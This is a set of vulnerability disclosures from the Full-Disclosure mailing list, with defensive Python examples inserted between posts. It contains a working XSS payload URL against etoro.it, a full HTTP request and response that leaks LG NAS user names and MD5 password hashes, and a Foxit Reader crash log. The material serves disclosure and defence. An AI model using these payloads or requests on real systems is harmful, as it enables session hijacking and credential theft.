[Full-disclosure] etoro.it vulnerable to XSS
The famous online trading website is vulnerable to an XSS attack.

PoC: http://www.etoro.it/educazione/node/1008/10%22%20onMouseOver=%22alert%28document.cookie%29%22

Info: https://tig3rblog.wordpress.com/2012/09/29/etoro-it-vulnerable-to-xss/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
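As an added example (not part of the advisory and not etoro.it's code), the Python below reconstructs the attribute-injection mechanism behind the PoC and shows the fix: the <a> template is a hypothetical stand-in for a page that reflects the URL path into an href attribute, and the check parses the rendered markup the way a browser would.

```python
# Added example: why the PoC path segment works and how HTML-attribute
# encoding neutralises it. The <a> template is a hypothetical stand-in;
# the real etoro.it markup is not on the list.
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Path segment from the PoC URL in the advisory, URL-decoded:
#   10" onMouseOver="alert(document.cookie)"
POC_SEGMENT = unquote("10%22%20onMouseOver=%22alert%28document.cookie%29%22")


def render_naive(segment: str) -> str:
    """Reflects the raw segment into a quoted attribute (the vulnerable pattern)."""
    return f'<a href="/educazione/node/1008/{segment}">next</a>'


def render_escaped(segment: str) -> str:
    """Same template, but the value is HTML-attribute-encoded first.
    escape(..., quote=True) turns '"' into '&quot;', so the value can no
    longer close the href attribute and start an event-handler attribute."""
    return f'<a href="/educazione/node/1008/{escape(segment, quote=True)}">next</a>'


class _AttrCollector(HTMLParser):
    """Records the attribute names of the first <a> tag as the parser sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a" and not self.attrs:
            self.attrs = [name for name, _ in attrs]


def attribute_names(markup: str) -> list:
    """Parse the markup and return the attribute names of its first <a> tag."""
    parser = _AttrCollector()
    parser.feed(markup)
    return parser.attrs


if __name__ == "__main__":
    print(render_naive(POC_SEGMENT))
    print(attribute_names(render_naive(POC_SEGMENT)))    # includes 'onmouseover'
    print(attribute_names(render_escaped(POC_SEGMENT)))  # ['href']
```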
[Full-disclosure] LG NAS Users and password hash disclosure
# Exploit Title: LG NAS Users and password hash disclosure
# Date: 2012-09-29
# Vendor Homepage: http://www.lg.com/
# Version: = firmware_2660
# Tested on: N2B1 Network Storage
# Vendor notification: Not notified due to the stupid nature of the vuln..

This vulnerability has been discovered on LG N2B1 Network Storage (NAS), but probably other products that use the same firmware may be affected.

Any authenticated user, administrator or not, is able to retrieve a list of current authorized users along with MD5 password hashes. The page /en/php/share_get_user_info.php is prone to disclose authorized users along with their MD5 hashed passwords to any authenticated user.

Sample HTTP request:

###
POST /en/php/share_get_user_info.php?t=any random number HTTP/1.1
Host: 192.168.0.1:8000
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 14
Cookie: lgnas_language=en; show_filter=true; lgnas_web_menu=1; PHPSESSID=your session
Pragma: no-cache
Cache-Control: no-cache

mode=FullList
###

Sample HTTP response:

###
HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=utf-8
Date: Sat, 29 Sep 2012 06:51:02 GMT
Server: lighttpd/1.4.20
Content-Length: 83

admin;21232f297a57a5a743894a0e4a801fc3;System Admin;;Default System Administrator:
###
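Added example, not LG's code (the real handler is PHP and is not on the list): a hypothetical Python re-implementation of the mode=FullList response showing the two fixes a defender would want, an administrator-only check and a response that never serialises the hash column. The user store is constructed, and the ';' column layout is assumed from the sample response above.

```python
# Added example: hardened stand-in for share_get_user_info.php mode=FullList.
# Two fixes versus the behaviour in the advisory: non-admin sessions are
# refused the listing, and the hash column is never written to the response.
from dataclasses import dataclass

@dataclass(frozen=True)
class UserRecord:
    """One account as the NAS stores it; the advisory's sample line reads
    name;hash;display name;;description, the layout assumed here."""
    name: str
    password_hash: str
    display_name: str
    description: str
    is_admin: bool

# Constructed sample store: the admin hash is the value quoted in the
# advisory, the guest hash is a placeholder.
USERS = [
    UserRecord("admin", "21232f297a57a5a743894a0e4a801fc3", "System Admin",
               "Default System Administrator", True),
    UserRecord("guest", "<placeholder-hash>", "Guest", "Share user", False),
]

def serialize_public(rec: UserRecord) -> str:
    """Same ';'-separated layout as the original response, but the hash
    column is left empty so the secret never crosses the wire."""
    return ";".join([rec.name, "", rec.display_name, "", rec.description])

def full_list(session_user: str, mode: str) -> str:
    """Hardened handler: mode=FullList needs an administrator session;
    any other mode returns only the caller's own public record."""
    caller = next((u for u in USERS if u.name == session_user), None)
    if caller is None:
        raise PermissionError("no authenticated session")
    if mode != "FullList":
        return serialize_public(caller)
    if not caller.is_admin:
        raise PermissionError("FullList requires an administrator session")
    return "\n".join(serialize_public(u) for u in USERS)

def is_denied(session_user: str, mode: str) -> bool:
    """True when the handler refuses the request."""
    try:
        full_list(session_user, mode)
    except PermissionError:
        return True
    return False

if __name__ == "__main__":
    print(full_list("admin", "FullList"))   # listing without hashes
    print(is_denied("guest", "FullList"))   # True
```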
Re: [Full-disclosure] Foxit Reader suffers from Division By Zero
On Sat, Sep 29, 2012 at 4:01 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

> Title: Foxit Reader suffers from Division By Zero
> Version : 5.4.3.0920
> Date : 2012-09-28
> Vendor : http://www.foxitsoftware.com/
> Impact : Med/High
> Contact : coolkaveh [at] rocketmail.com
> Twitter : @coolkaveh
> tested : XP SP3
>
> # Bug : division by zero vulnerability during the handling of the pdf files. that will trigger a denial of service condition
> #
> (b34.f24): Integer divide-by-zero - code c094 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax= ebx= ecx= edx= esi= edi=
> eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246
> *** ERROR: Module load completed but symbols could not be loaded for FoxitReader_Lib_Full.exe
> FoxitReader_Lib_Full+0x158c8c:
> 00558c8c f7f7 div eax,edi
> 0:000> r;!exploitable -v;q
> eax= ebx= ecx= edx= esi= edi=
> eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246
> FoxitReader_Lib_Full+0x158c8c:
> 00558c8c f7f7 div eax,edi
> HostMachine\HostUser
> Executing Processor Architecture is x86
> Debuggee is in User Mode
> Debuggee is a live user mode debugging session on the local machine
> Event Type: Exception
> *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
> Exception Faulting Address: 0x558c8c
> First Chance Exception Type: STATUS_INTEGER_DIVIDE_BY_ZERO (0xC094)
> Faulting Instruction:00558c8c div eax,edi
> Basic Block:
> 00558c8c div eax,edi
> Tainted Input Operands: ax, dx, eax, edi
> 00558c8e cmp dword ptr [esp+3ch],eax
> Tainted Input Operands: eax
> 00558c92 jae foxitreader_lib_full+0x158f06 (00558f06)
> Tainted Input Operands: CarryFlag
> Exception Hash (Major/Minor): 0x6461647c.0x64616453
> Stack Trace:
> FoxitReader_Lib_Full+0x158c8c
> Instruction Address: 0x00558c8c
> Description: Integer Divide By Zero
> Short Description: DivideByZero
> Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x00158c8c (Hash=0x6461647c.0x64616453)
>
> # Proof of concept .pdf included.

--
“There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Foxit Reader suffers from Division By Zero
On Sat, Sep 29, 2012 at 8:01 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

> Title: Foxit Reader suffers from Division By Zero
> Version : 5.4.3.0920
> [...]
> division by zero vulnerability during the handling of the pdf files. that will trigger a denial of service condition
> [...]
> Proof of concept .pdf included.

Confirmed with V5 Foxit Reader 5.4.3.0920 on WinXP Pro SP3 (though with a slightly different offset - 0015eb8c ... ASLR ?).

Interestingly, NOT confirmed for Foxit Reader 4.3.1.0323 (the last version of the V4 Foxit Reader, which is the last version many people are comfortable with); with this version I get a dialog box stating "format error: not a PDF or corrupted", and no crash. This is also on XP Pro SP3.

Another reason to be disappointed with Foxit Reader V5 :)

Cheers
Nick Boyce
--
You are in a maze of twisty little relative jumps, all alike.